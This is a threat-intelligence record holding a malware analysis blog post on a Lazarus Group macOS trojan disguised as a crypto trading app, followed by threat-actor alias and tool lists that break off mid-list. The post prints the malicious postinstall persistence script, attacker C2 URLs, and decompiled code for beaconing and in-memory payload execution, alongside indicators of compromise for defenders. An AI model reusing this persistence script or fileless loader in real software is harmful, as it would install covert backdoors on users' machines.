{
	"id": "f8e2ab62-21cc-4262-b66a-2ec166820a57",
	"created_at": "2026-04-06T00:09:23.517118Z",
	"updated_at": "2026-04-10T03:38:19.351053Z",
	"deleted_at": null,
	"sha1_hash": "db4d393ec942e8a3c1c3ce18eef66051aa214a1c",
	"title": "Lazarus Group Goes 'Fileless'",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2575932,
	"plain_text": "Lazarus Group Goes 'Fileless'\r\nArchived: 2026-04-05 13:08:18 UTC\r\nan implant w/ remote download \u0026 in-memory execution\r\nby: Patrick Wardle / December 3, 2019\r\nOur research, tools, and writing are supported by \"Friends of Objective-See\" such as: CleanMyMac X\r\n📝 👾 Want to play along?\r\nI’ve added the sample (‘OSX.AppleJeus.C’) to our malware collection (password: infect3d)\r\n…please don’t infect yourself!\r\nBackground\r\nToday, Dinesh_Devadoss posted a tweet about another Lazarus group macOS trojan:\r\nAs I’d recently written about a Lazarus group first-stage implant (see: “Pass the AppleJeus”), I was intrigued to analyze this sample!\r\nWe’ll see that while there are some clear overlaps, this (new) sample contains rather sophisticated capabilities which I’ve never seen before in (public) macOS malware!\r\nInfection Vector\r\nIn his tweet, Dinesh kindly provided an MD5 hash: 6588d262529dc372c400bef8478c2eec which allows us to locate the sample ( UnionCryptoTrader.dmg ) on VirusTotal, where it’s only flagged as malicious by two of the engines. (See: UnionCryptoTrader.dmg on VirusTotal).\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 1 of 17\r\nFrom the URL provided in Dinesh’s tweet ( https://unioncrypto.vip/ ) and spelunking around on VirusTotal, we can gain an understanding of the infection mechanism.\r\nLazarus Group has a propensity for targeting users or administrators of crypto-currency exchanges. And their de facto method of infecting such targets is via fake crypto-currency company and trading applications.\r\nAs part of my recent RSA presentation I highlighted their attack vector:\r\nIn this specific attack, Lazarus group created a new website, unioncrypto.vip :\r\nPinging this site reveals that it’s still online, and resolving to 104.168.167.16 :\r\n$ ping unioncrypto.vip\r\nPING unioncrypto.vip (104.168.167.16): 56 data bytes\r\n64 bytes from 104.168.167.16: icmp_seq=0 ttl=112 time=91.483 ms\r\nQuerying VirusTotal with this IP address, we find a URL request that triggered a download of the malicious application ( https://www.unioncrypto.vip/download/W6c2dq8By7luMhCmya2v97YeN ):\r\nIt seems reasonable to assume that Lazarus Group is sticking with its successful attack vector (of targeting employees of crypto-currency exchanges with trojanized trading applications) …for now!\r\nAnalysis (Persistence)\r\nLet’s begin analysis of the trojanized application. Said application is delivered via a disk image named UnionCryptoTrader.dmg . We can mount this disk image via the hdiutil attach command:\r\n$ hdiutil attach ~/Downloads/UnionCryptoTrader.dmg\r\nexpected CRC32 $7720DF1C\r\n/dev/disk4 GUID_partition_scheme\r\n/dev/disk4s1 Apple_APFS\r\n/dev/disk5 EF57347C-0000-11AA-AA11-0030654\r\n/dev/disk5s1 41504653-0000-11AA-AA11-0030654 /Volumes/UnionCryptoTrader\r\nIt contains a single package: UnionCryptoTrader.pkg :\r\n$ ls -lart /Volumes/UnionCryptoTrader\r\ntotal 40120\r\n-rwxrwxrwx 1 patrick staff 20538265 Sep 4 06:25 UnionCryptoTrader.pkg\r\nVia our “WhatsYourSign” application, it’s easy to see the UnionCryptoTrader.pkg package is unsigned:\r\n…which means macOS will warn the user if they attempt to open it:\r\nTaking a peek at the package uncovers a postinstall script that will be executed at the end of the installation process:\r\n#!/bin/sh\r\nmv /Applications/UnionCryptoTrader.app/Contents/Resources/.vip.unioncrypto.plist /Library/LaunchDaemons/vip.unioncrypto.plist\r\n\r\nchmod 644 /Library/LaunchDaemons/vip.unioncrypto.plist\r\nmkdir /Library/UnionCrypto\r\n\r\nmv /Applications/UnionCryptoTrader.app/Contents/Resources/.unioncryptoupdater /Library/UnionCrypto/unioncryptoupdater\r\n\r\nchmod +x /Library/UnionCrypto/unioncryptoupdater\r\n/Library/UnionCrypto/unioncryptoupdater \u0026\r\nThe purpose of this script is to persistently install a launch daemon. Specifically, the script will:\r\nmove a hidden plist ( .vip.unioncrypto.plist ) from the application’s Resources directory into /Library/LaunchDaemons\r\nset it to be owned by root\r\ncreate a /Library/UnionCrypto directory\r\nmove a hidden binary ( .unioncryptoupdater ) from the application’s Resources directory into /Library/UnionCrypto/\r\nset it to be executable\r\nexecute this binary ( /Library/UnionCrypto/unioncryptoupdater )\r\nWe can passively observe this part of the installation via either our File or Process monitors:\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"mv\",\r\n \"/Applications/UnionCryptoTrader.app/Contents/Resources/.vip.unioncrypto.plist\",\r\n \"/Library/LaunchDaemons/vip.unioncrypto.plist\"\r\n ],\r\n \"ppid\" : 3457,\r\n \"ancestors\" : [\r\n 3457,\r\n 951,\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 603996161,\r\n \"signatureIdentifier\" : \"com.apple.mv\",\r\n \"cdHash\" : \"7F1F3DE78B1E86A622F0B07F766ACF2387EFDCD\",\r\n \"isPlatformBinary\" : 1\r\n },\r\n \"path\" : \"/bin/mv\",\r\n \"pid\" : 3458\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\n...\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"mv\",\r\n \"/Applications/UnionCryptoTrader.app/Contents/Resources/.unioncryptoupdater\",\r\n \"/Library/UnionCrypto/unioncryptoupdater\"\r\n ],\r\n \"ppid\" : 3457,\r\n \"ancestors\" : [\r\n 3457,\r\n 951,\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 603996161,\r\n \"signatureIdentifier\" : \"com.apple.mv\",\r\n \"cdHash\" : \"7F1F3DE78B1E86A622F0B07F766ACF2387EFDCD\",\r\n \"isPlatformBinary\" : 1\r\n },\r\n \"path\" : \"/bin/mv\",\r\n \"pid\" : 3461\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\n...\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"/Library/UnionCrypto/unioncryptoupdater\"\r\n ],\r\n \"ppid\" : 1,\r\n \"ancestors\" : [\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 536870919,\r\n \"signatureIdentifier\" : \"macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392\",\r\n \"cdHash\" : \"8D204E5B7AE08E80B728DE675AEB8CC735CCF6E7\",\r\n \"isPlatformBinary\" : 0\r\n },\r\n \"path\" : \"/Library/UnionCrypto/unioncryptoupdater\",\r\n \"pid\" : 3463\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\nThough installing a launch daemon requires root access, the installer will prompt the user for their credentials:\r\nOnce the installer completes, the binary unioncryptoupdater will be both currently executing and persistently installed:\r\n$ ps aux | grep [u]nioncryptoupdater\r\nroot 1254 /Library/UnionCrypto/unioncryptoupdater\r\nOf course, BlockBlock will detect the launch daemon persistence attempt:\r\nAs noted, persistence is achieved via the vip.unioncrypto.plist launch daemon:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003c!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n \u003ckey\u003eLabel\u003c/key\u003e\r\n \u003cstring\u003evip.unioncrypto.product\u003c/string\u003e\r\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003e/Library/UnionCrypto/unioncryptoupdater\u003c/string\u003e\r\n \u003c/array\u003e\r\n \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n \u003ctrue/\u003e\r\n\u003c/dict\u003e\r\n\u003c/plist\u003e\r\nAs the RunAtLoad key is set to true, this instructs macOS to automatically launch the binary specified in the ProgramArguments array each time the infected system is rebooted. As such, /Library/UnionCrypto/unioncryptoupdater will be automatically (re)executed.\r\nAnalysis (Capabilities)\r\nOk, time to analyze the persisted unioncryptoupdater binary.\r\nVia the file command we can ascertain it’s a standard macOS (64-bit) binary:\r\n$ file /Library/UnionCrypto/unioncryptoupdater\r\n/Library/UnionCrypto/unioncryptoupdater: Mach-O 64-bit executable x86_64\r\nThe codesign utility shows us both its identifier ( macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392 ) and the fact that it’s not signed with a valid code signing id, but rather ad hoc ( Signature=adhoc ):\r\n$ codesign -dvv /Library/UnionCrypto/unioncryptoupdater\r\nExecutable=/Library/UnionCrypto/unioncryptoupdater\r\nIdentifier=macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392\r\nFormat=Mach-O thin (x86_64)\r\nCodeDirectory v=20100 size=739 flags=0x2(adhoc) hashes=15+5 location=embedded\r\nSignature=adhoc\r\nInfo.plist=not bound\r\nTeamIdentifier=not set\r\nSealed Resources=none\r\nInternal requirements count=0 size=12\r\nRunning the strings utility (with the -a flag) reveals some interesting strings:\r\n$ strings -a /Library/UnionCrypto/unioncryptoupdater\r\ncurl_easy_perform() failed: %s\r\nAES_CYPHER_128 encrypt test case:\r\nAES_CYPHER_128 decrypt test case:\r\nAES_CYPHER_192 encrypt test case:\r\nAES_CYPHER_192 decrypt test case:\r\nAES_CYPHER_256 encrypt test case:\r\nAES_CYPHER_256 decrypt test case:\r\nInput:\r\nIOPlatformExpertDevice\r\nIOPlatformSerialNumber\r\n/System/Library/CoreServices/SystemVersion.plist\r\nProductVersion\r\nProductBuildVersion\r\nMac OS X %s (%s)\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n/tmp/updater\r\n%s %s\r\nNO_ID\r\n%s%s\r\n12GWAPCT1F0I1S14\r\nauth_timestamp\r\nauth_signature\r\ncheck\r\nhttps://unioncrypto.vip/update\r\ndone\r\n/bin/rcp\r\nCould not create image.\r\nCould not link image.\r\nCould not find ec.\r\nCould not resolve symbol: _sym[25] == 0x4d6d6f72.\r\nCould not resolve symbol: _sym[4] == 0x4d6b6e69.\r\nStrings such as IOPlatformSerialNumber and the reference to SystemVersion.plist likely indicate basic survey capabilities (to gather information about the infected system). The reference to the libcurl API ( curl_easy_perform ) and the embedded URL https://unioncrypto.vip/update indicate networking and/or command and control capabilities.\r\nOpening the binary ( unioncryptoupdater ) in a disassembler shows the main function simply invoking a function named onRun :\r\nint _main() {\r\n rbx = objc_autoreleasePoolPush();\r\n\r\n onRun();\r\n\r\n objc_autoreleasePoolPop(rbx);\r\n return 0x0;\r\n}\r\nThough rather long and involved, we can break down its logic.\r\n1. Instantiate a C++ class named Barbeque: Barbeque::Barbeque(); By piping the output of the nm utility into c++filt we can dump other methods from the Barbeque class:\r\n$ nm unioncryptoupdater | c++filt\r\nunsigned short Barbeque::Barbeque()\r\nunsigned short Barbeque::get( ... )\r\nunsigned short Barbeque::post( ... )\r\nunsigned short Barbeque::~Barbeque()\r\nBased on method names, perhaps the Barbeque class contains network related logic?\r\n2. Invokes a function named getDeviceSerial to retrieve the system serial number via IOKit ( IOPlatformSerialNumber ):\r\nint __Z15getDeviceSerialPc(int * arg0) {\r\n\r\n ...\r\n\r\n r15 = *(int32_t *)*_kIOMasterPortDefault;\r\n rax = IOServiceMatching(\"IOPlatformExpertDevice\");\r\n rax = IOServiceGetMatchingService(r15, rax);\r\n if (rax != 0x0) {\r\n // copy the IOPlatformSerialNumber property into the caller's buffer (r14)\r\n rbx = CFStringGetCString(IORegistryEntryCreateCFProperty(rax, @\"IOPlatformSerialNumber\", **_kCFAllocatorDefault, 0x0), r14, 0x20, 0x8000100) != 0x0 ? 0x1 : 0x0;\r\n\r\n IOObjectRelease(rax);\r\n }\r\n rax = rbx;\r\n return rax;\r\n}\r\nDebugging the malware (in a VM) shows this method correctly returns the virtual machine’s serial number ( VM+nL/ueNmNG ):\r\n(lldb) x/s $rax\r\n0x7ffeefbff810: \"VM+nL/ueNmNG\"\r\n3. Invokes a function named getOSVersion in order to retrieve the OS version, by reading the system file /System/Library/CoreServices/SystemVersion.plist (which contains various version-related information):\r\n$ defaults read /System/Library/CoreServices/SystemVersion.plist\r\n{\r\n ProductBuildVersion = 18F132;\r\n ProductCopyright = \"1983-2019 Apple Inc.\";\r\n ProductName = \"Mac OS X\";\r\n ProductUserVisibleVersion = \"10.14.5\";\r\n ProductVersion = \"10.14.5\";\r\n iOSSupportVersion = \"12.3\";\r\n}\r\nAgain in the debugger, we can observe the malware retrieving this information (specifically the ProductName , ProductUserVisibleVersion , and ProductBuildVersion ):\r\n(lldb) x/s 0x7ffeefbff790\r\n0x7ffeefbff790: \"Mac OS X 10.14.5 (18F132)\"\r\n4. Builds a string consisting of the time and a hardcoded value (key?): 12GWAPCT1F0I1S14\r\nsprintf(\u0026var_130, \"%ld\", time(0x0));\r\nrax = sprintf(\u0026var_1B0, \"%s%s\", \u0026var_130, \"12GWAPCT1F0I1S14\");\r\n5. Invokes the Barbeque::post() method to contact a remote command \u0026 control server ( https://unioncrypto.vip/update ). The network logic leverages libcurl to perform the actual communications:\r\ncurl_easy_setopt(*r15, 0x2727);\r\ncurl_easy_setopt(*r15, 0x4e2b);\r\ncurl_easy_setopt(*r15, 0x2711);\r\nrdi = *r15;\r\ncurl_easy_setopt(rdi, 0x271f);\r\nrax = curl_easy_perform(*r15);\r\nOur firewall LuLu easily detects this connection attempt:\r\n6. If the server responds with the string \"0\" the malware will sleep for 10 minutes, before checking in again with the server:\r\nif (std::__1::basic_string ... ::compare(rbx, 0x0, 0xffffffffffffffff, \"0\", 0x1) == 0x0)\r\n{\r\n sleep(0x258); // 0x258 = 600 seconds = 10 minutes\r\n goto connect2Server;\r\n}\r\nOtherwise it will invoke a function to base64 decode the server’s response, followed by a function named processUpdate to execute a downloaded payload from the server.\r\nOk, so we’ve got a fairly standard persistent 1st-stage implant which beacons to a remote server for (likely) a 2nd-stage fully-featured implant.\r\nAt this time, while the remote command \u0026 control server remains online, it is simply responding with a “0”, meaning no payload is provided :(\r\nAs such, we must rely on static analysis methods for the remainder of our analysis.\r\nHowever, there is one rather unique aspect of this 1st-stage implant: the ability to execute the received payload directly from memory!\r\nLet’s take a closer look at how the malware implements this stealthy capability.\r\nRecall that if the server responds with a payload (and not the string \"0\" ), the malware invokes the processUpdate function. First, processUpdate decrypts said payload (via aes_decrypt_cbc ), then invokes a function named load_from_memory .\r\naes_decrypt_cbc(0x0, r15, rdx, rcx, \u0026var_40);\r\nmemcpy(\u0026var_C0, r15, 0x80);\r\nrbx = rbx + 0x90;\r\nr14 = r14 - 0x90;\r\nrax = _load_from_memory(rbx, r14, \u0026var_C0, rcx, \u0026var_40, r9);\r\nThe load_from_memory function first mmaps some memory (with protections: PROT_READ | PROT_WRITE | PROT_EXEC), then copies the decrypted payload into this memory region, before invoking a function named memory_exec2 :\r\nint _load_from_memory(int arg0, int arg1, int arg2, int arg3, int arg4, int arg5) {\r\n r14 = arg2;\r\n r12 = arg1;\r\n r15 = arg0;\r\n // 0x7 = PROT_READ | PROT_WRITE | PROT_EXEC\r\n rax = mmap(0x0, arg1, 0x7, 0x1001, 0xffffffffffffffff, 0x0);\r\n if (rax != 0xffffffffffffffff) {\r\n memcpy(rax, r15, r12);\r\n r14 = _memory_exec2(rax, r12, r14);\r\n munmap(rax, r12);\r\n rax = r14;\r\n }\r\n else {\r\n rax = 0xffffffffffffffff;\r\n }\r\n return rax;\r\n}\r\nThe memory_exec2 function invokes the Apple API NSCreateObjectFileImageFromMemory to create an “object file image” from a memory buffer (of a Mach-O file). Following this, the NSLinkModule method is called to link the “object file image”.\r\nint _memory_exec2(int arg0, int arg1, int arg2) {\r\n\r\n ...\r\n rax = NSCreateObjectFileImageFromMemory(rdi, rsi, \u0026var_58);\r\n\r\n rax = NSLinkModule(var_58, \"core\", 0x3);\r\n\r\nAs the layout of an in-memory process image is different from its on-disk image, one cannot simply copy a file into memory and directly execute it. Instead, one must invoke APIs such as NSCreateObjectFileImageFromMemory and NSLinkModule (which take care of preparing the in-memory mapping and linking).\r\nOnce the malware has mapped and linked the downloaded payload, it invokes a function named find_macho which appears to search the memory mapping for MH_MAGIC_64 , the 64-bit “mach magic number” in the mach_header_64 structure ( 0xfeedfacf ):\r\nint find_macho(int arg0, int arg1, int arg2, int arg3) {\r\n\r\n ...\r\n\r\n do {\r\n ...\r\n if ((*(int32_t *)__error() == 0x2) \u0026\u0026 (*(int32_t *)rbx == 0xfeedfacf)) {\r\n break;\r\n }\r\n\r\n } while (true);\r\n}\r\nOnce the find_macho method returns, the malware begins parsing the in-memory Mach-O file. It appears to be looking for the address of the LC_MAIN load command ( 0x80000028 ):\r\nif (*(int32_t *)rcx == 0x80000028) goto loc_100006ac7;\r\nFor an in-depth technical discussion of parsing Mach-O files, see: “Parsing Mach-O Files”.\r\nThe LC_MAIN load command contains information such as the entry point of the Mach-O binary (for example, offset 18177 for the unioncryptoupdater binary):\r\nThe malware then retrieves the offset of the entry point (found at offset 0x8 within the LC_MAIN load command), sets up some arguments, then jumps to this address:\r\n//rcx points to the `LC_MAIN` load command\r\nr8 = r8 + *(rcx + 0x8);\r\n...\r\n\r\n//invoke payload's entry point!\r\nrax = (r8)(0x2, \u0026var_40, \u0026var_48, \u0026var_50, r8);\r\nDelightful! Pure in-memory execution of a remotely downloaded payload. 🤩 Sexy!\r\nIn 2015, at BlackHat I discussed this method of in-memory file execution as a means to increase stealth and complicate forensics (See: “Writing Bad @$$ Malware for OS X”):\r\n…kinda neat to see it (finally) show up in macOS malware in the wild!\r\nFormer #OBTS speaker Felix Seele (@c1truz_) noted that the (in)famous InstallCore adware also (ab)used the NSCreateObjectFileImageFromMemory and NSLinkModule APIs to achieve in-memory execution.\r\nInterestingly, the malware has a “backup” plan if the in-memory code execution fails. Specifically, if load_from_memory does not return 0 (success) it will write out the received payload to /tmp/updater and then execute it via a call to system :\r\nrax = _load_from_memory(rbx, r14, \u0026var_C0, rcx, \u0026var_40, r9);\r\nif(rax != 0x0) {\r\n fwrite(rbx, r14, 0x1, fopen(\"/tmp/updater\", \"wb\"));\r\n fclose(rax);\r\n\r\n chmod(\"/tmp/updater\", 0x1ff); // 0x1ff = mode 0777\r\n sprintf(\u0026var_4C0, \"%s %s\", \"/tmp/updater\", \u0026var_C0);\r\n\r\n rax = system(\u0026var_4C0);\r\n\r\n unlink(\"/tmp/updater\");\r\n}\r\nAlways good to handle error conditions and have a plan B!\r\nConclusion\r\nLazarus group continues to target macOS users with ever-evolving capabilities. Today, we analyzed a new sample with the ability to remotely download and execute payloads directly from memory!\r\nThe good news is the average Mac user doesn’t have to worry about being targeted by APT groups such as Lazarus. Moreover, as the installer package, UnionCryptoTrader.pkg , is unsigned, macOS will warn any users if they attempt to open it:\r\nHowever, if you do want to manually check if you’re infected, the following IoCs should help:\r\nLaunch Daemon property list: /Library/LaunchDaemons/vip.unioncrypto.plist\r\nRunning process/binary: /Library/UnionCrypto/unioncryptoupdater\r\nOr a tool such as KnockKnock can also uncover the infection:\r\n❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page (https://www.patreon.com/bePatron?c=701171)!\r\n…or better, sign up for our “The Art of Mac Malware Analysis” class at Objective by the Sea v3.0!\r\nSource: https://objective-see.com/blog/blog_0x51.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x51.html"
	],
	"report_names": [
		"blog_0x51.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
